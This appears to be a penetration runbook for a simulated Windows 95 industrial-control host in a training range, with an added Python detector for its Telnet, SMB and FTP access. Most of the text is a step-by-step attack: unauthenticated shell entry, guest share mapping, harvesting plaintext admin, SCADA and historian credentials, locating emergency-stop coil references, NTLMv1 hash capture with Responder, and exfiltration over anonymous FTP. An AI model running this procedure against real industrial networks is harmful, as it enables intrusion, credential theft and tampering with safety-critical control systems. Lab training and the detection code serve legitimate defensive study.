Runbook: hex-legacy-1
Entry
Telnet on port 23 drops directly into the Win95 shell with no login prompt. From any enterprise host:
TELNET 10.10.1.10
No username. No password. The service was configured open in 1999 and never revisited.
Share traversal (The “Open Door”)
Always start here. Engineering shares are often wide open.
C:\> NET VIEW
List all computers in the workgroup. Expect HEX-LEGACY-1 and UUPL-SRV-01.
C:\> NET VIEW \\HEX-LEGACY-1
See what this machine is sharing. The public share needs no credentials.
C:\> NET USE Z: \\HEX-LEGACY-1\public
Map the public share. Guest access: no username, no password required.
C:\> DIR Z:\ /s
Recursive directory dump. Pipe to a file for offline reading.
C:\> DIR Z:\ /s > list.txt
The private share is restricted. The Administrator password is in BACKUP.BAK, left on the C: drive since the 2003 migration and never deleted.
C:\> TYPE C:\PRIVATE\BACKUP.BAK
Shows the domain admin account recorded at migration time: Administrator / hex123.
C:\> NET USE Z: \\HEX-LEGACY-1\private hex123 /USER:Administrator
Maps the private share using the credential from BACKUP.BAK. Without credentials, the share returns Access Denied.
C:\> DIR Z:\ /s
Pre-mapped drives are already present: F: and G: both point at the public share.
G: is the faster path if you do not want to map Z:.
Recursive file hunting
Run from C:\ or from any mapped drive. The C: drive root is the starting point.
Files with intelligence value on this machine
C:\> DIR /s *.log
Engineering logbook: LOGBOOK\ENGINEER.LOG contains every system password.
C:\> DIR /s *.cfg
Configuration files: PRIVATE\PLCACCS.CFG has historian, SCADA, and SSH credentials.
C:\> DIR /s *.ini
Windows INI files: WINDOWS\WIN.INI and WINDOWS\SYSTEM\PROTOCOL.INI.
C:\> DIR /s *.bak
Raw backups: PRIVATE\BACKUP.BAK, uncompressed, contains the domain admin password.
C:\> DIR /s *.csv
SCADA logs: UUPL\SCADA\LOGS.CSV, event log from 1999 to 2003.
C:\> DIR /s *.txt
Plain text: UUPL\NETWORK.TXT is the current network inventory including historian and SCADA IPs.
Files this machine does not have
These are standard searches worth running on any Win95 OT target. They come up empty here, which confirms that these file types are absent rather than overlooked.
C:\> DIR /s *.prj
C:\> DIR /s *.mdb
C:\> DIR /s *.zip
C:\> DIR /s *.rar
Vendor-name hunting
Project folders on OT machines are almost always named after the PLC brand.
C:\> DIR /s *siemens*
C:\> DIR /s *rockwell*
C:\> DIR /s *ab*
C:\> DIR /s *modicon*
C:\> DIR /s *schneider*
C:\> DIR /s *omron*
These return nothing on hex-legacy-1. The control system here is UU P&L proprietary; vendor-name hunting establishes that there is no third-party project tree to pivot into.
Generic OT keywords:
C:\> DIR /s *plc*
C:\> DIR /s *scada*
C:\> DIR /s *hmi*
C:\> DIR /s *historian*
*plc* returns PRIVATE\PLCACCS.CFG. The others return nothing: *scada*, *hmi*, and *historian* match no filenames. The SCADA logs sit at UUPL\SCADA\LOGS.CSV; the directory is named SCADA but the file is not.
Credential and config scraping
FIND searches inside files. Combine with DIR /s output for maximum coverage.
Find passwords inside text-based files
C:\> FIND /i "password" LOGBOOK\ENGINEER.LOG
C:\> FIND /i "pass" PRIVATE\PLCACCS.CFG
C:\> FIND /i "credential" UUPL\NETWORK.TXT
The first two return credential lines directly. The credential search in NETWORK.TXT returns the pointer to ENGINEER.LOG, where all system passwords are consolidated.
From the mapped G: drive (public share):
C:\> FIND /i "pass" G:\LOGBOOK\ENGINEER.LOG
C:\> FIND /i "hist_read" G:\LOGBOOK\ENGINEER.LOG
hist_read / history2017 is the historian ingest credential. It appears only in ENGINEER.LOG, not in PLCACCS.CFG. It is the credential that unlocks the historian write endpoint.
Find IP addressing
C:\> FIND /i "10.10" UUPL\NETWORK.TXT
C:\> FIND /i "gateway" WINDOWS\SYSTEM\PROTOCOL.INI
C:\> FIND /i "10.10.2" G:\UUPL\NETWORK.TXT
Find Modbus and industrial protocol references
C:\> FIND /i "modbus" UUPL\PROCS.TXT
C:\> FIND /i "coil" UUPL\PROCS.TXT
C:\> FIND /i "trip" UUPL\SCADA\LOGS.CSV
PROCS.TXT names the emergency stop coil and the actuator IPs directly. LOGS.CSV is a SCADA event log from 1999 to 2003; searching for “trip” returns the relay B trip events.
Historian and SCADA database hunting
hex-legacy-1 does not host the historian database locally; it holds references to it.
C:\> DIR /s *.mdb
C:\> DIR /s *.dbf
Empty. Era-appropriate formats for 1999: *.mdb (Access) and *.dbf (dBASE/FoxPro). The historian runs on 10.10.2.10 and accepts HTTP queries. The credentials to reach it are in ENGINEER.LOG and PLCACCS.CFG.
Tag and signal list exports:
C:\> DIR /s *tag*.csv
C:\> DIR /s *point*.txt
C:\> DIR /s *io*.csv
LOGS.CSV is the closest equivalent: it is a SCADA event log with asset names, not a tag database.
Network and transfer commands
C:\> WINIPCFG
IP configuration. Shows the real MAC address (Adapter Address field), IP (10.10.1.10), subnet mask, and the real default gateway (populated from the enterprise network, not a placeholder).
C:\> ROUTE PRINT
Routing table. Confirms this machine sees only the enterprise segment (10.10.1.0/24).
C:\> ARP -a
ARP cache: shows recent contacts on the enterprise segment.
C:\> NBTSTAT -A 10.10.2.10
NetBIOS name lookup against the historian. Returns HISTORIAN-01.
C:\> NBTSTAT -A 10.10.1.20
Returns BURSAR-DESK: confirms the finance workstation is up and reachable.
C:\> FTP 10.10.1.10
At “Name” type anonymous. At “Password” type anything. Then navigate with cd LOGBOOK, get ENGINEER.LOG. Same files as the public SMB share.
TFTP client is present. No TFTP server runs on this machine; use FTP or SMB for file retrieval.
hist_read / history2017 is the ingest (write) credential. It appears only in ENGINEER.LOG, not in PLCACCS.CFG. Verifying it against the historian requires a machine with an HTTP client: wizzards-retreat or bursar-desk.
Realistic for Win95 OT?
No PowerShell. Everything is DIR, FIND, NET, COPY.
No WMI. Use NET commands instead.
No audit logging. Win95 systems did not log file access; there is no trail for DIR and FIND.
Plaintext everything. INI, CFG, LOG, TXT files throughout, none encrypted.
Shared drives are the attack surface. Mapping G: (or the public share directly) gives a complete network inventory and all system passwords. The private share adds the same credential list in a different format.
The NTLMv1 configuration means any captured authentication challenge can be cracked offline. Responder on the enterprise segment plus any browse operation by the machine produces crackable hashes.
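Since the host keeps no file-access trail, the only place the access paths in this runbook (Telnet on 23, SMB over NetBIOS on 139, anonymous FTP on 21) leave evidence is on the network. The following is an added example, not part of the original runbook: a small Python detector that parses Zeek-style conn.log lines and flags sessions to hex-legacy-1 on those ports, marking large responses on 139/21 as probable listing or share dumps. The sample log lines, field layout, port set and byte threshold are constructed assumptions.

```python
"""Network-side detection for the hex-legacy-1 entry points (added example)."""
from collections import namedtuple

LEGACY_HOST = "10.10.1.10"   # hex-legacy-1, as given in the runbook

# Ports the runbook uses against this host (Win95 SMB is NetBIOS/TCP 139, no 445).
WATCHED_PORTS = {
    23: "telnet-no-auth",     # TELNET 10.10.1.10 drops into a shell, no login
    21: "anonymous-ftp",      # FTP 10.10.1.10 with Name: anonymous
    139: "smb-share-mount",   # NET USE \\HEX-LEGACY-1\public (guest access)
}

Alert = namedtuple("Alert", "ts src label resp_bytes")

def parse_conn_line(line):
    """Parse one tab-separated conn.log record (assumed column order:
    ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration
    orig_bytes resp_bytes). Returns None for header/comment/short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    f = line.rstrip("\n").split("\t")
    if len(f) < 11:
        return None
    return {"ts": f[0], "orig": f[2], "resp": f[4], "rport": int(f[5]),
            "resp_bytes": int(f[10]) if f[10].isdigit() else 0}

def detect(lines, legacy_host=LEGACY_HOST, bulk_threshold=100_000):
    """Return an Alert for every session to the legacy host on a watched port.
    A large resp_bytes on 139 or 21 is the wire signature of a recursive
    listing or share dump being pulled off the box, so it gets a suffix."""
    alerts = []
    for line in lines:
        rec = parse_conn_line(line)
        if rec is None or rec["resp"] != legacy_host:
            continue
        label = WATCHED_PORTS.get(rec["rport"])
        if label is None:
            continue
        if rec["rport"] in (139, 21) and rec["resp_bytes"] >= bulk_threshold:
            label += "+bulk-transfer"
        alerts.append(Alert(rec["ts"], rec["orig"], label, rec["resp_bytes"]))
    return alerts

# Constructed sample log: an enterprise host hitting Telnet, SMB and FTP,
# plus an unrelated HTTP flow that must not alert.
SAMPLE_LOG = """#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes
1700000001.1\tC1\t10.10.1.20\t51000\t10.10.1.10\t23\ttcp\ttelnet\t120.0\t800\t4200
1700000002.2\tC2\t10.10.1.20\t51001\t10.10.1.10\t139\ttcp\t-\t30.0\t1500\t250000
1700000003.3\tC3\t10.10.1.30\t51002\t10.10.1.10\t80\ttcp\thttp\t1.0\t200\t300
1700000004.4\tC4\t10.10.1.20\t51003\t10.10.1.10\t21\ttcp\tftp\t5.0\t300\t900
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f"{a.ts} {a.src} -> {LEGACY_HOST}: {a.label} ({a.resp_bytes} bytes back)")
```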
Note
A single command dumps the entire C: drive listing for offline review:
C:\> DIR C:\ /s > C:\TEMP\c_drive_listing.txt
Then exfiltrate via FTP (anonymous on port 21) or copy to a mapped share on the attacker machine.
Quick reference
NET VIEW                                       find machines in workgroup
NET USE Z: \\HEX-LEGACY-1\public               map public share (no password)
NET USE Z: \\HEX-LEGACY-1\private              map private share (Administrator / hex123)
DIR Z:\ /s > list.txt                          dump everything
DIR /s *.log                                   find ENGINEER.LOG (all passwords)
DIR /s *.cfg                                   find PLCACCS.CFG (historian, SCADA, SSH)
DIR /s *.bak                                   find BACKUP.BAK (domain admin password)
DIR /s *siemens*                               vendor hunting (empty on this host)
FIND /i "pass" LOGBOOK\ENGINEER.LOG            credential scrape
FIND /i "hist_read" G:\LOGBOOK\ENGINEER.LOG    ingest credential (logbook only)
WINIPCFG                                       own IP, real MAC, and real default gateway
ROUTE PRINT                                    routing table
NBTSTAT -A 10.10.2.10                          historian NetBIOS name
FTP 10.10.1.10                                 anonymous FTP (Name: anonymous, Password: anything)